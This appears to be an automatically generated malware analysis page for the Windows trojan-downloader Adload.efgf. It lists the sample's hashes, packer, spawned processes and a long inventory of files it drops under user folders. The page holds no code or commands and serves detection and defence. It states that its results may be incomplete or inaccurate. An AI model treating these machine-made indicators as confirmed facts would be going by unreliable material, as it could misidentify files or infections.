Skip to main content

TrojanDownloader.Win32.Adload.efgf_6acad04bb0


Trojan-Downloader.Win32.Adload.efgf (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 6acad04bb03501dc920778ed12ba6d63

SHA1: 8742d5aa6108e0142c9511ccb2bd49040791ce3d

SHA256: 383790bd98ec2787bf57fa7e9db4e0ac11355cca830e85104222d447e8320ddf

SSDeep: 98304:lQPSI bq48LiQ9F4yrJ/KRLuDN8OZPYJFyc74yZhhgFl39:m4g5PZZ8OZPU1MchMlN

Size: 3645088 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: BorlandDelphi30, UPolyXv05_v6

Company: ????

Created at: 2014-07-09 10:58:13

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

attrib.exe:1168
attrib.exe:1520
%original file name%.exe:2040
riliquicken.exe:408
6acad04bb03501dc920778ed12ba6d63.tmp:560
uCalendar.exe:1840

The Trojan-Downloader injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:2040 makes changes in the file system.


The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (7386 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (0 bytes)

The process riliquicken.exe:408 makes changes in the file system.


The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll (129151 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe (23636 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wdj2.tmp (9730 bytes)
%Documents and Settings%\%current user%\My Documents\xiaomama1.ico (4672 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll (524674 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe (26068 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\version (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Icon_1[1].ico (11345 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll (35828 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll (40972 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe (7772 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wdj1.tmp (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (920 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe (12588 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll (131173 bytes)

The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the file system.


The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EACIG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BO590.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EUT2I.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R2SHE.tmp (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VUE7K.tmp (854 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CITBH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I07M1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UQKI3.tmp (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-E3NQ3.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J9IO1.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T5GBV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-45E9P.tmp (571 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UT2U1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FSAKH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H9PQM.tmp (372 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HBFP8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MS510.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P460L.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FA3VP.tmp (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ATVIR.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JMCVI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0DT6F.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GG746.tmp (799 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6ABIJ.tmp (418 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UB0UL.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CA7DT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H5M3H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GBDV.tmp (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JC94V.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8P1G7.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4F4V4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S5K1J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM4TE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9K96Q.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HSHNI.tmp (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NC7K8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-8TDL0.tmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A8EAG.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EAR7G.tmp (846 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RDQEM.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-O8MRK.tmp (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-7T15P.tmp (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B31VB.tmp (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8Q63L.tmp (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5VQIL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GS5K.tmp (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9BQPC.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BN1AB.tmp (954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-257BU.tmp (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B22SN.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KKAGK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4A2KS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5UAA5.tmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2S8M.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GA32U.tmp (713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RVE9.tmp (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K5UU2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GN5N1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1Q822.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHN29.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xttj[1].htm (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AU387.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-9OFM7.tmp (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-59Q2H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQAU1.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S5QPM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-F61GP.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EM3D2.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PAS5F.tmp (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCVVM.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MB7TH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DPTNS.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-USMNK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-84K0R.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FODVB.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UF6NE.tmp (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JVH2E.tmp (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PEHSU.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.dat (77177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SOF93.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD63S.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE4AE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-47L4D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TOHRA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KPEV6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-82AQ4.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\Icons\ab091a108ba11a214cb2497830748b5a.ico (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OIK1B.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LM96A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2UJR7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BFVNJ.tmp (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T7SDK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DMUUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NQK6G.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-179PC.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VKG5F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-64LEO.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8IFBJ.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-19FF6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0UA5R.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CK9D1.tmp (833 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-04CEU.tmp (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KSVR2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0IGTG.tmp (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N3NUO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3ID9I.tmp (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNKL9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-589D2.tmp (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NK9JL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIS2A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SIE6F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-VDS88.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQ06S.tmp (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-15K0J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-26K4C.tmp (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\is-F0AFL.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ODTLG.tmp (394 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P4A60.tmp (13 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A0EIM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RNBC6.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LL8KV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LN8C3.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KLVNJ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DFOPO.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MKQ0P.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CTVUM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FLS7N.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6BKNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B6BC5.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J7PLB.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TKKFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P73ID.tmp (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V911M.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K3A0H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFOCI.tmp (891 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S329D.tmp (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-ACG6D.tmp (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IDDQ0.tmp (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-TBR47.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DC97P.tmp (857 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RELD2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TLJE9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99O8Q.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VP4MN.tmp (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IGNP2.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM9J5.tmp (949 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6H2UT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0L13V.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N5L7C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A4S61.tmp (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2K1SC.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAG71.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FPQV4.tmp (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BM7CV.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-URB1U.tmp (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QDAFG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DO1SP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U18FV.tmp (896 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U189L.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FMB0Q.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DRCF3.tmp (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\16246473[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4J0MN.tmp (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PCUV5.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QJ7LF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4P8GP.tmp (986 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6856F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIMV2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SUTI1.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9IE2G.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2AFEU.tmp (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OUGF5.tmp (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIDQ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCB5A.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OR4OD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHIVK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IMBOL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S9S0K.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0FVRG.tmp (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GJFDH.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-71SNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SJIC0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6DTUJ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QAKU2.tmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9TLEA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2LCQJ.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-05TI6.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FU923.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R66KJ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3H86F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GLIR6.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-46B8N.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6G59B.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5FR8P.tmp (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TK5N6.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0VFG1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKGKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SEBU8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GPUG4.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2CI1C.tmp (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L41F1.tmp (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ESTCQ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2GDDK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9M85H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F8PVH.tmp (1 bytes)
